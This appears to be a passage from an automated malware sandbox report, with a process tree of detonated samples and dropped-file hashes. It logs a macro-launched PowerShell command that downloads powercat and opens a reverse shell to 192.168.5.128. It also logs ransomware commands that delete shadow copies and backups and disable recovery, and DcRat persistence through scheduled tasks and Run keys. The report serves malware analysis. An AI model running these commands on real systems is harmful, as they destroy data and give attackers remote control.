                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8972 /prefetch:8
                                                              5⤵
                                                                PID:5112
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                5⤵
                                                                • Drops file in Program Files directory
                                                                PID:5084
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x11c,0x118,0x240,0xf0,0x7ff607045460,0x7ff607045470,0x7ff607045480
                                                                  6⤵
                                                                    PID:1488
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8972 /prefetch:8
                                                                  5⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4856
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8604 /prefetch:8
                                                                  5⤵
                                                                    PID:4852
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=9008 /prefetch:2
                                                                    5⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4108
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1736 /prefetch:8
                                                                    5⤵
                                                                      PID:3944
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4380 /prefetch:8
                                                                      5⤵
                                                                        PID:6640
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:8
                                                                        5⤵
                                                                          PID:4500
                                                                  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2.doc" /o ""
                                                                    2⤵
                                                                    • Checks processor information in registry
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:4868
                                                                  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                                    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\3.xlsx"
                                                                    2⤵
                                                                    • Checks processor information in registry
                                                                    • Enumerates system info in registry
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:1904
                                                                  • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                    4.exe
                                                                    2⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4044
                                                                    • C:\Windows\SysWOW64\fondue.exe
                                                                      "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
                                                                      3⤵
                                                                        PID:824
                                                                        • C:\Windows\system32\FonDUE.EXE
                                                                          "C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
                                                                          4⤵
                                                                            PID:5544
                                                                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                        5.exe
                                                                        2⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:452
                                                                        • C:\Windows\SysWOW64\fondue.exe
                                                                          "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
                                                                          3⤵
                                                                            PID:1080
                                                                            • C:\Windows\system32\FonDUE.EXE
                                                                              "C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
                                                                              4⤵
                                                                                PID:5492
                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                            6.exe
                                                                            2⤵
                                                                            • DcRat
                                                                            • Adds Run key to start application
                                                                            • Drops file in Program Files directory
                                                                            • Drops file in Windows directory
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1852
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RScBCIKDLc.bat"
                                                                              3⤵
                                                                                PID:6564
                                                                                • C:\Windows\system32\w32tm.exe
                                                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                  4⤵
                                                                                    PID:6536
                                                                                  • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                    4⤵
                                                                                    • Adds Run key to start application
                                                                                    • Drops file in System32 directory
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1644
                                                                                    • C:\Windows\SysWOW64\glmf32\Fondue.exe
                                                                                      "C:\Windows\SysWOW64\glmf32\Fondue.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • System policy modification
                                                                                      PID:3580
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
                                                                                2⤵
                                                                                  PID:3320
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a504718
                                                                                    3⤵
                                                                                      PID:1480
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
                                                                                    2⤵
                                                                                      PID:5328
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a504718
                                                                                        3⤵
                                                                                          PID:5632
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7.exe
                                                                                        7.exe
                                                                                        2⤵
                                                                                          PID:5640
                                                                                          • C:\Windows\SysWOW64\fondue.exe
                                                                                            "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
                                                                                            3⤵
                                                                                              PID:5744
                                                                                              • C:\Windows\system32\FonDUE.EXE
                                                                                                "C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
                                                                                                4⤵
                                                                                                  PID:5696
                                                                                            • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                              "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9.docm" /o ""
                                                                                              2⤵
                                                                                              • Checks processor information in registry
                                                                                              • Enumerates system info in registry
                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:2536
                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                cmd /c powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128/powercat.ps1');powercat -c 192.168.5.128 -p 1111 -e cmd
                                                                                                3⤵
                                                                                                • Process spawned unexpected child process
                                                                                                PID:6740
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128/powercat.ps1');powercat -c 192.168.5.128 -p 1111 -e cmd
                                                                                                  4⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5612
                                                                                            • C:\Users\Admin\AppData\Local\Temp\10.exe
                                                                                              10.exe
                                                                                              2⤵
                                                                                              • Drops startup file
                                                                                              • Sets desktop wallpaper using registry
                                                                                              PID:5808
                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                attrib +h .
                                                                                                3⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:6700
                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                icacls . /grant Everyone:F /T /C /Q
                                                                                                3⤵
                                                                                                • Modifies file permissions
                                                                                                PID:6716
                                                                                              • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                taskdl.exe
                                                                                                3⤵
                                                                                                  PID:6872
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c 258741648069295.bat
                                                                                                  3⤵
                                                                                                    PID:6916
                                                                                                    • C:\Windows\SysWOW64\cscript.exe
                                                                                                      cscript.exe //nologo m.vbs
                                                                                                      4⤵
                                                                                                        PID:5588
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                      taskdl.exe
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5372
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                      taskdl.exe
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3508
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\@[email protected]
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:6108
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
                                                                                                        TaskData\Tor\taskhsvc.exe
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:7032
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c start /b @[email protected] vs
                                                                                                      3⤵
                                                                                                        PID:5160
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\@[email protected]
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:3132
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                            5⤵
                                                                                                              PID:4020
                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                wmic shadowcopy delete
                                                                                                                6⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4936
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6788
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "isljbgsxj479" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
                                                                                                          3⤵
                                                                                                            PID:6116
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "isljbgsxj479" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
                                                                                                              4⤵
                                                                                                              • Adds Run key to start application
                                                                                                              • Modifies registry key
                                                                                                              PID:7124
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\@[email protected]
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Sets desktop wallpaper using registry
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:5936
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                            taskdl.exe
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5392
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3660
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                            taskdl.exe
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2888
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8.exe
                                                                                                          8.exe
                                                                                                          2⤵
                                                                                                          • Modifies extensions of user files
                                                                                                          • Drops startup file
                                                                                                          • Sets desktop wallpaper using registry
                                                                                                          • Drops file in Program Files directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:6060
                                                                                                          • C:\Windows\system32\wbem\wmic.exe
                                                                                                            "C:\cgjk\rp\..\..\Windows\ti\ofa\fnjnq\..\..\..\system32\krd\..\wbem\fwtuo\elb\..\..\wmic.exe" shadowcopy delete
                                                                                                            3⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4668
                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:5260
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:5852
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\ja-JP\dllhost.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:4616
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\ShellComponents\System.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:6208
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:6248
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\odt\cmd.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:6292
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Search.Core\SearchApp.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:6448
                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                          1⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:6860
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6872
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "Fondue" /sc ONLOGON /tr "'C:\Windows\SysWOW64\glmf32\Fondue.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:452
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:7072
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:5920
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper\msedge.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:6128
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "8" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\10\8.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:4924
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\setup\TrustedInstaller.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:444
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\odt\winlogon.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:3500
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks.exe /create /tn "10" /sc ONLOGON /tr "'C:\Users\Admin\Documents\My Pictures\10.exe'" /rl HIGHEST /f
                                                                                                          1⤵
                                                                                                          • DcRat
                                                                                                          • Process spawned unexpected child process
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:776
                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x504 0x508
                                                                                                          1⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4740

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

                                                                                                          Filesize

                                                                                                          471B

                                                                                                          MD5

                                                                                                          0e95ac2ef7a6e5069ffb24d35a3a9c86

                                                                                                          SHA1

                                                                                                          012d28ed0f0d48d4436411ce7cd19776aee9af45

                                                                                                          SHA256

                                                                                                          3e37932dee3464c22f55eb94282b7305292fb3247e55b43176c6607a5d62a4da

                                                                                                          SHA512

                                                                                                          8c535815685b59d61dd9971c31b62fe542ff204934d01c0000e41eba3904e992e83d3174acda0d266f73eba17c3b47808c1208730e386bc288f36b3e9d3726d3

                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

                                                                                                          Filesize

                                                                                                          446B

                                                                                                          MD5

                                                                                                          398455ed08c1e752e80b627c75ba4bd1

                                                                                                          SHA1

                                                                                                          0b778d544b233b13b947a750d3d4cd064d30f693

                                                                                                          SHA256

                                                                                                          71ea687a0ea5c6858fb0ad6057fa38cae8f66ac6690350e073ad4f253c802c43

                                                                                                          SHA512

                                                                                                          c4d69e86727596cbe93376920901e48203f1adb942a45d78ac751c2185471e2e2a723c11b86da7501983502bae22b75b2e15755f643c27a0118649f453803eec

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          78afdcc28744f3ccc897189551e60a14

                                                                                                          SHA1

                                                                                                          6408c2447363d821dc659254a324456ed16207ec

                                                                                                          SHA256

                                                                                                          ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

                                                                                                          SHA512

                                                                                                          8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          78afdcc28744f3ccc897189551e60a14

                                                                                                          SHA1

                                                                                                          6408c2447363d821dc659254a324456ed16207ec

                                                                                                          SHA256

                                                                                                          ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

                                                                                                          SHA512

                                                                                                          8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          78afdcc28744f3ccc897189551e60a14

                                                                                                          SHA1

                                                                                                          6408c2447363d821dc659254a324456ed16207ec

                                                                                                          SHA256

                                                                                                          ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

                                                                                                          SHA512

                                                                                                          8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          78afdcc28744f3ccc897189551e60a14

                                                                                                          SHA1

                                                                                                          6408c2447363d821dc659254a324456ed16207ec

                                                                                                          SHA256

                                                                                                          ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

                                                                                                          SHA512

                                                                                                          8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          78afdcc28744f3ccc897189551e60a14

                                                                                                          SHA1

                                                                                                          6408c2447363d821dc659254a324456ed16207ec

                                                                                                          SHA256

                                                                                                          ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

                                                                                                          SHA512

                                                                                                          8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          78afdcc28744f3ccc897189551e60a14

                                                                                                          SHA1

                                                                                                          6408c2447363d821dc659254a324456ed16207ec

                                                                                                          SHA256

                                                                                                          ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

                                                                                                          SHA512

                                                                                                          8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          78afdcc28744f3ccc897189551e60a14

                                                                                                          SHA1

                                                                                                          6408c2447363d821dc659254a324456ed16207ec

                                                                                                          SHA256

                                                                                                          ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

                                                                                                          SHA512

                                                                                                          8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

